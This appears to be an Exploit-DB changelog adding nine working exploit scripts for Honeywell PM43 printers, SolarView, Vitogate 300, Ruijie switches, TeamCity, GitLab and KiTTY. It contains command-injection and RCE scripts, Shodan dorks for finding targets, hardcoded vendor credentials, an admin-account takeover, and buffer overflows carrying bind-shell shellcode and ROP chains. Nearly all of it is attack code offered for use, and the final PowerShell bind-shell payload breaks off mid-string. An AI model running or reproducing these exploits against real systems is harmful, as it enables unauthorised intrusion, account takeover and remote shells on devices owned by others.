DB: 2024-03-15

10 changes to exploits/shellcodes/ghdb

Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)

Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)

SolarView Compact 6.00 - Command Injection

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)

GitLab CE/EE < 16.7.2 - Password Reset

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)
KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
KiTTY 0.76.1.13 - Command Injection

exploits/hardware/remote/51885.py

@@ -0,0 +1,57 @@
+#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
+#- Shodan Dork: http.title:PM43 , PM43
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Frimware Version: versions prior to P10.19.050004
+#- Tested on: P10.17.019667
+#- CVE : CVE-2023-3710
+
+
+import requests
+import argparse
+
+BLUE = '\033[94m'
+YELLOW = '\033[93m'
+RESET = '\033[0m'
+
+def banner():
+    banner = """
+    ╔════════════════════════════════════════════════╗
+        CVE-2023-3710
+        Command Injection in Honeywell PM43 Printers
+        Author: ByteHunter
+    ╚════════════════════════════════════════════════╝
+    """
+    print(YELLOW + banner + RESET)
+
+
+def run_command(url, command):
+    full_url = f"{url}/loadfile.lp?pageid=Configure"
+    payload = {
+        'username': f'hunt\n{command}\n',
+        'userpassword': 'admin12345admin!!'
+    }
+    try:
+        response = requests.post(full_url, data=payload, verify=False)
+        response_text = response.text
+        html_start_index = response_text.find('<html>')
+        if html_start_index != -1:
+            return response_text[:html_start_index]
+        else:
+            return response_text
+    except requests.exceptions.RequestException as e:
+        return f"Error: {e}"
+
+def main():
+    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
+    parser.add_argument('--url', dest='url', help='Target URL', required=True)
+    parser.add_argument('--run', dest='command', help='Command to execute', required=True)
+
+    args = parser.parse_args()
+
+    response = run_command(args.url, args.command)
+    print(f"{BLUE}{response}{RESET}")
+
+if __name__ == "__main__":
+    banner()
+    main()

exploits/hardware/remote/51886.py

@@ -0,0 +1,39 @@
+#- Exploit Title: SolarView Compact 6.00 - Command Injection
+#- Shodan Dork: http.html:"solarview compact"
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Version: 6.00
+#- Tested on: 6.00
+#- CVE : CVE-2023-23333
+
+
+import argparse
+import requests
+
+def vuln_check(ip_address, port):
+    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
+    response = requests.get(url)
+    if response.status_code == 200:
+        output = response.text
+        if "root" in output:
+            print("Vulnerability detected: Command Injection possible.")
+            print(f"passwd file content:\n{response.text}")
+
+
+        else:
+            print("No vulnerability detected.")
+    else:
+        print("Error: Unable to fetch response.")
+
+def main():
+    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
+    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
+    parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
+    args = parser.parse_args()
+
+    ip_address = args.ip
+    port = args.port
+    vuln_check(ip_address, port)
+
+if __name__ == "__main__":
+    main()

exploits/hardware/remote/51887.py

@@ -0,0 +1,78 @@
+#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
+#- Shodan Dork: http.title:'Vitogate 300'
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Version: versions up to 2.1.3.0
+#- Tested on: 2.1.1.0
+#- CVE : CVE-2023-5702 & CVE-2023-5222
+
+
+import argparse
+import requests
+
+def banner():
+    banner = """
+    ╔═══════════════════════════════════╗
+             CVE-2023-5702
+           Vitogate 300 RCE
+           Author: ByteHunter
+    ╚═══════════════════════════════════╝
+    """
+
+    print(banner)
+
+
+def send_post_request(target_ip, command, target_port):
+    payload = {
+        "method": "put",
+        "form": "form-4-7",
+        "session": "",
+        "params": {
+            "ipaddr": f"1;{command}"
+        }
+    }
+
+    headers = {
+        "Host": target_ip,
+        "Content-Length": str(len(str(payload))),
+        "Content-Type": "application/json"
+    }
+
+    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"
+
+
+    response = requests.post(url, json=payload, headers=headers)
+
+    if response.status_code == 200:
+        print("Result:")
+        print(response.text)
+    else:
+        print(f"Request failed! status code: {response.status_code}")
+
+def main():
+    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
+    parser.add_argument("--target", required=False, help="Target IP address")
+    parser.add_argument("--port", required=False, help="Target port",default="80")
+    parser.add_argument("--command", required=False, help="Command")
+    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")
+
+    args = parser.parse_args()
+
+    if args.creds:
+        print("Vitogate 300 hardcoded administrative accounts credentials")
+        print("Username: vitomaster, Password: viessmann1917")
+        print("Username: vitogate, Password: viessmann")
+    else:
+        target_ip = args.target
+        target_port = args.port
+        command = args.command
+
+        if not (target_ip and command):
+            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
+            return
+
+        send_post_request(target_ip, command,target_port)
+
+if __name__ == "__main__":
+    banner()
+    main()

exploits/hardware/remote/51888.py

@@ -0,0 +1,55 @@
+#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
+#- Shodan Dork: http.html_hash:-1402735717
+#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
+#- Exploit Author: ByteHunter
+#- Email: 0xByteHunter@proton.me
+#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
+#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
+
+import http.client
+import argparse
+
+def send_request(ip, port, command):
+    headers = {
+        "Host": f"{ip}:{port}",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate, br",
+        "DNT": "1",
+        "Connection": "close",
+        "Upgrade-Insecure-Requests": "1",
+        "Cmdnum": "1",
+        "Confirm1": "n",
+        "Content-Length": "0",
+        "Command1": command
+    }
+
+    try:
+        connection = http.client.HTTPConnection(f"{ip}:{port}")
+        connection.request("GET", "/EXCU_SHELL", headers=headers)
+        response = connection.getresponse()
+
+
+        print(f"Status Code: {response.status}")
+        print(response.read().decode('utf-8'))
+        connection.close()
+
+    except Exception as e:
+        print(f"Request failed: {e}")
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
+    parser.add_argument('--ip', help='Target IP address', required=True)
+    parser.add_argument('--port', help='Port', required=True)
+    parser.add_argument('--cmd', help='Command', required=True)
+    args = parser.parse_args()
+
+
+    ip = args.ip
+    port = args.port
+    command = args.cmd
+
+
+    send_request(ip, port, command)

exploits/java/remote/51884.py

@@ -0,0 +1,107 @@
+#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)
+#- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648
+#- Exploit Author: ByteHunter
+#- Vendor: JetBrains
+#- Email: 0xByteHunter@proton.me
+#- vendor: JetBrains
+#- Version: versions before 2023.05.4
+#- Tested on: 2023.05.3
+#- CVE : CVE-2023-42793
+
+import requests
+import argparse
+import re
+import random
+import string
+import subprocess
+
+
+banner = """
+=====================================================
+*       CVE-2023-42793                              *
+*  TeamCity Admin Account Creation                  *
+*                                                   *
+*  Author: ByteHunter                               *
+=====================================================
+"""
+
+print(banner)
+parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC")
+parser.add_argument("-u", "--url", required=True, help="Target URL")
+parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode")
+args = parser.parse_args()
+
+url = args.url
+
+if url.startswith("https://"):
+    curl_command = "curl -k"
+else:
+    curl_command = "curl"
+
+get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"
+delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"
+create_user_url = f"{url}/app/rest/users"
+
+create_user_command = ""
+token = ""
+
+response = requests.post(get_token_url, verify=False)
+if response.status_code == 200:
+    match = re.search(r'value="([^"]+)"', response.text)
+    if match:
+        token = match.group(1)
+        print(f"Token: {token}")
+    else:
+        print("Token not found in the response")
+
+elif response.status_code == 404:
+    print("Token already exists")
+    delete_command = f'{curl_command} -X DELETE {delete_token_url}'
+    delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    delete_process.wait()
+    delete_output = delete_process.communicate()
+    if delete_process.returncode == 0:
+        print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")
+    else:
+        print("Failed to delete the previous token")
+elif response.status_code == 400:
+    print("Token already exists")
+    delete_command = f'{curl_command} -X DELETE {delete_token_url}'
+    delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    delete_process.wait()
+    delete_output = delete_process.communicate()
+    if delete_process.returncode == 0:
+        print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")
+    else:
+        print("Failed to delete the previous token")
+else:
+    print("Failed to get a token")
+
+if token:
+    headers = {
+        "Authorization": f"Bearer {token}",
+        "Content-Type": "application/json"
+    }
+    random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4))
+    username = f"city_admin{random_chars}"
+    data = {
+        "username": username,
+        "password": "Main_password!!**",
+        "email": "angry-admin@funnybunny.org",
+        "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}
+    }
+    create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\''
+    create_user_response = requests.post(create_user_url, headers=headers, json=data)
+    if create_user_response.status_code == 200:
+        print("Successfully exploited!")
+        print(f"URL: {url}")
+        print(f"Username: {username}")
+        print("Password: Main_password!!**")
+    else:
+        print("Failed to create new admin user")
+
+if args.verbose:
+    if response.status_code == 400:
+        pass
+    else:
+        print(f"Final curl command: {create_user_command}")

exploits/java/remote/51889.txt

@@ -0,0 +1,12 @@
+# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
+# Exploit Author: Sebastian Kriesten (0xB455)
+# Twitter: https://twitter.com/0xB455
+
+# Date: 2024-01-12
+# Vendor Homepage: gitlab.com
+# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
+# Version: <16.7.2, <16.6.4, <16.5.6
+# CVE: CVE-2023-7028
+
+Proof of Concept:
+user[email][]=valid@email.com&user[email][]=attacker@email.com

exploits/windows/local/51890.py

@@ -0,0 +1,143 @@
+# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
+# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
+# Vendor Homepage: https://github.com/cyd01/KiTTY/=
+# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
+# Version: ≤ 0.76.1.13
+# Tested on: Microsoft Windows 11/10/8/7/XP
+# CVE: 2024-25003
+#-------------------------------------------------------------------------------------#
+# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
+#-------------------------------------------------------------------------------------#
+# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
+# [*] Payload Handler Started as Job 1                                                #
+# msf6 payload(windows/shell_bind_tcp) >                                              #
+# [*] Started bind TCP handler against 192.168.100.28:4444                            #
+# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444)   #
+#-------------------------------------------------------------------------------------#
+
+import sys
+import os
+import struct
+
+#---------------------------------------------------------------------------------------------#
+# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py #
+# windows/shell_bind_tcp - 375 bytes                                                          #
+# https://metasploit.com/                                                                     #
+# Encoder: x86/xor_poly                                                                       #
+# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                            #
+# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                                 #
+# AutoVerifySession=true                                                                      #
+#---------------------------------------------------------------------------------------------#
+
+buf =  b""
+buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41"
+buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff"
+buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc"
+buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28"
+buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f"
+buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb"
+buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4"
+buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4"
+buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85"
+buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f"
+buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13"
+buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30"
+buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c"
+buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0"
+buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f"
+buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7"
+buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44"
+buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4"
+buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84"
+buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5"
+buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3"
+buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc"
+buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99"
+buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83"
+buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90"
+buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80"
+buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc"
+buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b"
+buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76"
+buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde"
+buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4"
+buf += b"\xf2\x3b\x21"
+
+
+def shellcode():
+	sc = b''
+	sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
+	sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
+	sc += b'\x29\xD8'             # sub    eax,ebx
+	sc += b'\x29\xC4'             # sub    esp,eax
+	sc += buf
+	sc += b'\x90' * (1052-len(sc))
+	assert len(sc) == 1052
+	return sc
+
+
+def create_rop_chain():
+
+	# rop chain generated with mona.py - www.corelan.be
+	rop_gadgets = [
+	#[---INFO:gadgets_to_set_esi:---]
+	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
+	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
+	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
+	#[---INFO:gadgets_to_set_ebp:---]
+	0x00429953,  # POP EBP # RETN [kitty.exe]
+	0x005405b0, # push esp; ret 0 [kitty.exe]
+	#[---INFO:gadgets_to_set_ebx:---]
+	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
+	0x00000201,  # 0x00000201-> ebx
+	#[---INFO:gadgets_to_set_edx:---]
+	0x00430dce,  # POP EDX # RETN [kitty.exe]
+	0x00000040,  # 0x00000040-> edx
+	#[---INFO:gadgets_to_set_ecx:---]
+	0x005ac58c,  # POP ECX # RETN [kitty.exe]
+	0x004d81d9,  # &Writable location [kitty.exe]
+	#[---INFO:gadgets_to_set_edi:---]
+	0x004fa404,  # POP EDI # RETN [kitty.exe]
+	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
+	#[---INFO:gadgets_to_set_eax:---]
+	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
+	0x90909090,  # nop
+	0x41414141,  # Filler (compensate)
+	#[---INFO:pushad:---]
+	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
+	]
+	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+
+#----------------------------------------------------------------------------------#
+# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40                                       #
+# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :                   #
+#   ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
+#   ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}                #
+# Shellcode size at ESP: 1052                                                      #
+#----------------------------------------------------------------------------------#
+
+return_address = struct.pack('<I',  0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}
+
+rop_chain_padding = b'\x90' * 35
+nops = b'\x90' * 88
+
+escape_sequence = b'\033]0;__dt:' + shellcode() + return_address
+escape_sequence += rop_chain_padding + rop_chain
+escape_sequence += b'\x90'
+escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490
+escape_sequence += nops + b'\007'
+
+stdout = os.fdopen(sys.stdout.fileno(), 'wb')
+stdout.write(escape_sequence)
+stdout.flush()

exploits/windows/local/51891.py

@@ -0,0 +1,139 @@
+# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
+# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
+# Vendor Homepage: https://github.com/cyd01/KiTTY/=
+# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
+# Version: ≤ 0.76.1.13
+# Tested on: Microsoft Windows 11/10/8/7/XP
+# CVE: CVE-2024-25004
+#-------------------------------------------------------------------------------------#
+# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
+#-------------------------------------------------------------------------------------#
+# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
+# [*] Payload Handler Started as Job 1                                                #
+# msf6 payload(windows/shell_bind_tcp) >                                              #
+# [*] Started bind TCP handler against 192.168.100.28:4444                            #
+# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   #
+#-------------------------------------------------------------------------------------#
+
+import sys
+import os
+import struct
+
+#-------------------------------------------------------------------------------------#
+# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
+# windows/shell_bind_tcp - 355 bytes                                                  #
+# https://metasploit.com/                                                             #
+# Encoder: x86/shikata_ga_nai                                                         #
+# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
+# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
+# AutoVerifySession=true                                                              #
+#-------------------------------------------------------------------------------------#
+
+buf =  b""
+buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
+buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
+buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
+buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
+buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
+buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
+buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
+buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
+buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
+buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
+buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
+buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
+buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
+buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
+buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
+buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
+buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
+buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
+buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
+buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
+buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
+buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
+buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
+buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
+buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
+buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
+buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
+buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
+buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
+buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
+
+
+def shellcode():
+	sc = b''
+	sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
+	sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
+	sc += b'\x29\xD8'             # sub    eax,ebx
+	sc += b'\x29\xC4'             # sub    esp,eax
+	sc += buf
+	sc += b'\x90' * (1042-len(sc))
+	assert len(sc) == 1042
+	return sc
+
+
+def create_rop_chain():
+	# rop chain generated with mona.py - www.corelan.be
+	rop_gadgets = [
+	#[---INFO:gadgets_to_set_esi:---]
+	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
+	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x41414141,  # Filler (compensate)
+	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
+	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
+	#[---INFO:gadgets_to_set_ebp:---]
+	0x00429953,  # POP EBP # RETN [kitty.exe]
+	0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
+	#[---INFO:gadgets_to_set_ebx:---]
+	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
+	0x00000201,  # 0x00000201-> ebx
+	#[---INFO:gadgets_to_set_edx:---]
+	0x00430dce,  # POP EDX # RETN [kitty.exe]
+	0x00000040,  # 0x00000040-> edx
+	#[---INFO:gadgets_to_set_ecx:---]
+	0x005ac58c,  # POP ECX # RETN [kitty.exe]
+	0x004d81d9,  # &Writable location [kitty.exe]
+	#[---INFO:gadgets_to_set_edi:---]
+	0x004fa404,  # POP EDI # RETN [kitty.exe]
+	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
+	#[---INFO:gadgets_to_set_eax:---]
+	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
+	0x90909090,  # nop
+	0x41414141,  # Filler (compensate)
+	#[---INFO:pushad:---]
+	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
+	]
+	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+
+#----------------------------------------------------------------------------------#
+# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                           #
+# Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
+#   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
+#   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
+# Shellcode size at ESP: 1042 bytes                                                #
+#----------------------------------------------------------------------------------#
+
+return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}
+
+rop_chain_padding = b'\x90' * 27
+nops = b'\x90' * 88
+
+escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
+escape_sequence += rop_chain_padding + rop_chain
+escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
+escape_sequence += nops + b'\007'
+
+stdout = os.fdopen(sys.stdout.fileno(), 'wb')
+stdout.write(escape_sequence)
+stdout.flush()

exploits/windows/local/51892.py

@@ -0,0 +1,57 @@
+# Exploit Title: KiTTY 0.76.1.13 - Command Injection
+# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
+# Vendor Homepage: https://github.com/cyd01/KiTTY/=
+# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
+# Version: ≤ 0.76.1.13
+# Tested on: Microsoft Windows 11/10/8/7/XP
+# CVE: CVE-2024-23749
+#-------------------------------------------------------------------------------------#
+# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
+#-------------------------------------------------------------------------------------#
+# msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                             #
+# [*] Payload Handler Started as Job 1                                                   #
+# msf6 payload(cmd/windows/powershell_bind_tcp) >                                        #
+# [*] Started bind TCP handler against 192.168.100.28:4444                               #
+# [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
+#----------------------------------------------------------------------------------------#
+
+import os
+import sys
+
+#-----------------------------------------------------------------#
+# msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
+#-----------------------------------------------------------------#
+
+shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
+shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
+shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
+shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
+shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
+shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
+shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
+shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK'
+shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
+shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
